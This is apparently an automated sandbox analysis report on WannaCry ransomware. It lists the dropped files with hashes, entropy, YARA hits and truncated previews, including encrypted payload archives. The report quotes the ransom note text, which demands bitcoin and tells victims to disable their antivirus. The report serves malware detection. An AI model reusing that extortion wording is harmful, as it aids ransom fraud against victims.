                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_norwegian.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):37577
                                                  Entropy (8bit):5.025836823617116
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdy2MG2D7mgwroXeo75Y3kmA31dv61Qy5:Shef3jHdGG23KrDZrS14N
                                                  MD5:FF70CC7C00951084175D12128CE02399
                                                  SHA1:75AD3B1AD4FB14813882D88E952208C648F1FD18
                                                  SHA-256:CB5DA96B3DFCF4394713623DBF3831B2A0B8BE63987F563E1C32EDEB74CB6C3A
                                                  SHA-512:F01DF3256D49325E5EC49FD265AA3F176020C8FFEC60EB1D828C75A3FA18FF8634E1DE824D77DFDD833768ACFF1F547303104620C70066A2708654A07EF22E19
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_polish.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):39896
                                                  Entropy (8bit):5.048541002474746
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdD2SG2gA8w8OJ6868jy8/8w8m8T848f8y858l8j8yv:Shef3jHdxG2KhuZrS14G
                                                  MD5:E79D7F2833A9C2E2553C7FE04A1B63F4
                                                  SHA1:3D9F56D2381B8FE16042AA7C4FEB1B33F2BAEBFF
                                                  SHA-256:519AD66009A6C127400C6C09E079903223BD82ECC18AD71B8E5CD79F5F9C053E
                                                  SHA-512:E0159C753491CAC7606A7250F332E87BC6B14876BC7A1CF5625FA56AB4F09C485F7B231DD52E4FF0F5F3C29862AFB1124C0EFD0741613EB97A83CBE2668AF5DE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_portuguese.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):37917
                                                  Entropy (8bit):5.027872281764284
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdy2QG2xgk5eo75Y3kmA31dv61QyV:Shef3jHdCG2EZrS14p
                                                  MD5:FA948F7D8DFB21CEDDD6794F2D56B44F
                                                  SHA1:CA915FBE020CAA88DD776D89632D7866F660FC7A
                                                  SHA-256:BD9F4B3AEDF4F81F37EC0A028AABCB0E9A900E6B4DE04E9271C8DB81432E2A66
                                                  SHA-512:0D211BFB0AE953081DCA00CD07F8C908C174FD6C47A8001FADC614203F0E55D9FBB7FA9B87C735D57101341AB36AF443918EE00737ED4C19ACE0A2B85497F41A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_romanian.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):52161
                                                  Entropy (8bit):4.964306949910696
                                                  Encrypted:false
                                                  SSDEEP:768:Shef3jHdXG2Cz2/vBAOZsQO0cLfnF/Zhcz7sDsYZBB/0gBjL+IU/hbhMVDtsR49P:ShehlrGR1m4dx9mjVyAvg7ouDT
                                                  MD5:313E0ECECD24F4FA1504118A11BC7986
                                                  SHA1:E1B9AE804C7FB1D27F39DB18DC0647BB04E75E9D
                                                  SHA-256:70C0F32ED379AE899E5AC975E20BBBACD295CF7CD50C36174D2602420C770AC1
                                                  SHA-512:C7500363C61BAF8B77FCE796D750F8F5E6886FF0A10F81C3240EA3AD4E5F101B597490DEA8AB6BD9193457D35D8FD579FCE1B88A1C8D85EBE96C66D909630730
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_russian.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):47108
                                                  Entropy (8bit):4.952777691675008
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2qG2aUGs0K6lyZqmfGGHRblldORZeo75Y3kmA31L:Shef3jHdeG2lGsDOcZxbP7ZrS14K
                                                  MD5:452615DB2336D60AF7E2057481E4CAB5
                                                  SHA1:442E31F6556B3D7DE6EB85FBAC3D2957B7F5EAC6
                                                  SHA-256:02932052FAFE97E6ACAAF9F391738A3A826F5434B1A013ABBFA7A6C1ADE1E078
                                                  SHA-512:7613DC329ABE7A3F32164C9A6B660F209A84B774AB9C008BF6503C76255B30EA9A743A6DC49A8DE8DF0BCB9AEA5A33F7408BA27848D9562583FF51991910911F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_slovak.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):41391
                                                  Entropy (8bit):5.027730966276624
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHd4Yb2YG2gNZ8a8zV/8j8U8l8x838Z8Q808m8d8T8hw:Shef3jHdZvG23AZrS14f
                                                  MD5:C911ABA4AB1DA6C28CF86338AB2AB6CC
                                                  SHA1:FEE0FD58B8EFE76077620D8ABC7500DBFEF7C5B0
                                                  SHA-256:E64178E339C8E10EAC17A236A67B892D0447EB67B1DCD149763DAD6FD9F72729
                                                  SHA-512:3491ED285A091A123A1A6D61AAFBB8D5621CCC9E045A237A2F9C2CF6049E7420EB96EF30FDCEA856B50454436E2EC468770F8D585752D73FAFD676C4EF5E800A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_spanish.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):37381
                                                  Entropy (8bit):5.02443306661187
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdf24G2/ezV6YQUdZYlujeMQ9RXmhRweo75Y3kmA31S:Shef3jHdrG2fuhZrS14T
                                                  MD5:8D61648D34CBA8AE9D1E2A219019ADD1
                                                  SHA1:2091E42FC17A0CC2F235650F7AAD87ABF8BA22C2
                                                  SHA-256:72F20024B2F69B45A1391F0A6474E9F6349625CE329F5444AEC7401FE31F8DE1
                                                  SHA-512:68489C33BA89EDFE2E3AEBAACF8EF848D2EA88DCBEF9609C258662605E02D12CFA4FFDC1D266FC5878488E296D2848B2CB0BBD45F1E86EF959BAB6162D284079
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_swedish.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):38483
                                                  Entropy (8bit):5.022972736625151
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdb24G2ZKLVdDeo75Y3kmA31dv61QyE:Shef3jHd/G2w6ZrS14w
                                                  MD5:C7A19984EB9F37198652EAF2FD1EE25C
                                                  SHA1:06EAFED025CF8C4D76966BF382AB0C5E1BD6A0AE
                                                  SHA-256:146F61DB72297C9C0FACFFD560487F8D6A2846ECEC92ECC7DB19C8D618DBC3A4
                                                  SHA-512:43DD159F9C2EAC147CBFF1DDA83F6A83DD0C59D2D7ACAC35BA8B407A04EC9A1110A6A8737535D060D100EDE1CB75078CF742C383948C9D4037EF459D150F6020
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_turkish.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):42582
                                                  Entropy (8bit):5.010722377068833
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHds42WG2mzGu/eo75Y3kmA31dv61QyZ:Shef3jHdsiG2moZrS149
                                                  MD5:531BA6B1A5460FC9446946F91CC8C94B
                                                  SHA1:CC56978681BD546FD82D87926B5D9905C92A5803
                                                  SHA-256:6DB650836D64350BBDE2AB324407B8E474FC041098C41ECAC6FD77D632A36415
                                                  SHA-512:EF25C3CF4343DF85954114F59933C7CC8107266C8BCAC3B5EA7718EB74DBEE8CA8A02DA39057E6EF26B64F1DFCCD720DD3BF473F5AE340BA56941E87D6B796C9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_vietnamese.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):93778
                                                  Entropy (8bit):4.76206134900188
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdW2YG22cViQj3KiG8dpcH8iEriG8E8O83Jz52sxG8h:Shef3jHdWG2+oPZrS14i
                                                  MD5:8419BE28A0DCEC3F55823620922B00FA
                                                  SHA1:2E4791F9CDFCA8ABF345D606F313D22B36C46B92
                                                  SHA-256:1F21838B244C80F8BED6F6977AA8A557B419CF22BA35B1FD4BF0F98989C5BDF8
                                                  SHA-512:8FCA77E54480AEA3C0C7A705263ED8FB83C58974F5F0F62F12CC97C8E0506BA2CDB59B70E59E9A6C44DD7CDE6ADEEEC35B494D31A6A146FF5BA7006136AB9386
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\r.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):864
                                                  Entropy (8bit):4.5335184780121995
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0Ei5bnBR7brW8PNAi0eEprY+Ai75wRZce/:DZD36W5/vWmMo+m
                                                  MD5:3E0020FC529B1C2A061016DD2469BA96
                                                  SHA1:C3A91C22B63F6FE709E7C29CAFB29A2EE83E6ADE
                                                  SHA-256:402751FA49E0CB68FE052CB3DB87B05E71C1D950984D339940CF6B29409F2A7C
                                                  SHA-512:5CA3C134201ED39D96D72911C0498BAE6F98701513FD7F1DC8512819B673F0EA580510FA94ED9413CCC73DA18B39903772A7CBFA3478176181CEE68C896E14CF
                                                  Malicious:false
                                                  Yara Hits:
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\Desktop\r.wnry, Author: Florian Roth (Nextron Systems)
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send %s to this bitcoin address: %s.... Next, please find an application file named "%s". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window...

                                                  C:\Users\user\Desktop\s.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                  Category:dropped
                                                  Size (bytes):3038286
                                                  Entropy (8bit):7.998263053003918
                                                  Encrypted:true
                                                  SSDEEP:49152:zUx4db9A1iRdHAHZXaTnCshuTnSQYUB/UZfCg2clOQin2h37l2Jh9iiRKpbXUSH:z/b96AdHA5XaTJvQYUBBgRlJi+rlliRy
                                                  MD5:AD4C9DE7C8C40813F200BA1C2FA33083
                                                  SHA1:D1AF27518D455D432B62D73C6A1497D032F6120E
                                                  SHA-256:E18FDD912DFE5B45776E68D578C3AF3547886CF1353D7086C8BEE037436DFF4B
                                                  SHA-512:115733D08E5F1A514808A20B070DB7FF453FD149865F49C04365A8C6502FA1E5C3A31DA3E21F688AB040F583CF1224A544AEA9708FFAB21405DDE1C57F98E617
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:PK..........!(................Data/PK........M..J................Data/Tor/PK..........!(................Tor/PK..........!(..t.......0.....Tor/libeay32.dll.:.t.e....6m.....Me.Vjil....!..E..T..e...*..e....,.c..o=..t.u..,....J..k-.x.V..:1u....v..7.L~..?{..rN23.w......o..N2....WU..G..G.......Ed..7..q.o.5.]w.{...wl\y..m..w...?]......n......Z]UX./h4.....]...71....e.\^1..I..MH5...k.o+..s...c|s....-#d,!..............eW...?a.......R..I..R......w.....m..#od.*q.&..g.;.C(..t.V...j.Jq%...d_.Js...Hk.j#...DH.....,8_.O...]U....t .......ks:..T...18.C.%ASZJ3.U.nl..J.@)...$...N.s.O........m.0..*e..4.....m...lI..Z..7.f-.?....;...?.SO....}..7#.L8...5.z.~.........E.S..1....7.*.0...pf.....jz.)..Y..8..^....B........p.W..r..B.....p..?......../`*Wl..D.xAi..$..d.......&..p. ..bOtE.\.......(..&A...6v..S..Q...L...3 .:.6.m7.'.......)......iH.NZ_t.;./.a..n.g...A`.T.k.........."...<.rt..3....0.{N..yy...p.z.=..#.u.u...d......mQ..*.H..2.N.BRSN...XC....).".@.._.18.&...n

                                                  C:\Users\user\Desktop\t.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):65816
                                                  Entropy (8bit):7.997276137881339
                                                  Encrypted:true
                                                  SSDEEP:1536:am+vLII5ygV8/tuH+P9zxqDKvARpmKiRMkTERU:a9LAg4tXPTEKvADmFgRU
                                                  MD5:5DCAAC857E695A65F5C3EF1441A73A8F
                                                  SHA1:7B10AAEEE05E7A1EFB43D9F837E9356AD55C07DD
                                                  SHA-256:97EBCE49B14C46BEBC9EC2448D00E1E397123B256E2BE9EBA5140688E7BC0AE6
                                                  SHA-512:06EB5E49D19B71A99770D1B11A5BB64A54BF3352F36E39A153469E54205075C203B08128DC2317259DB206AB5323BDD93AAA252A066F57FB5C52FF28DEEDB5E2
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....8"'....].~>(...*PdIf.'.m>...2.0.`p...^...#I|..<.W.B.=....M..zxFp....0e...P...."....nhB)>....B..}.[d$......,...8.....k$.....S.w+.....N.....p/...Y.LC......9L.\!u...?hH".<d..dS%A.......Iu...nEi7I.....8.V..:F....-...,........\....}..`1?..m..5g.I'..................q.\..9`..t.....a......(|.8.L....67.gjrS.|.e...f.Fi......\...r.k.!d......8.'g1y+..'.i1t.L.>.u..:......<.fN.:Tf{..M.....W....._......_:...rR(.M..A?:...H.W.....=l......r..f..JX...:.z.rC.....f.X Qx.4....2....&w+..&kDqFU..u.............Sg..4k..<5.Zd$F.ED...1.S.d.. .eW.i....p.2..&.~S.l.R8$&q.L3.<.2....x ..by.zO.w. .hs.q.....I.1..D.F...J).&.....SD..v..m...V.....G...B`.u>K@.\_N......#.|..w.....Z.).X..[..o.(.'.~.nq.hq1.....:!.Q.P...c.KA,.3..m...j>.X.;..<.*."AU..R....Y....d]....U....).@...Q....|K.=.d.cI.x.....O...\(.%}.j..YG}...i.....R..j.`..9...5.....o..U...xu>+.$y...z... ...5......s..e...G...W.".T.'..iH..B.Sl...h..7B..E.8.....K.bRm...FE..W'_Q1...... ...A.5.}..%.../^VL.;.".w

                                                  C:\Users\user\Desktop\taskdl.exe

                                                  Download File
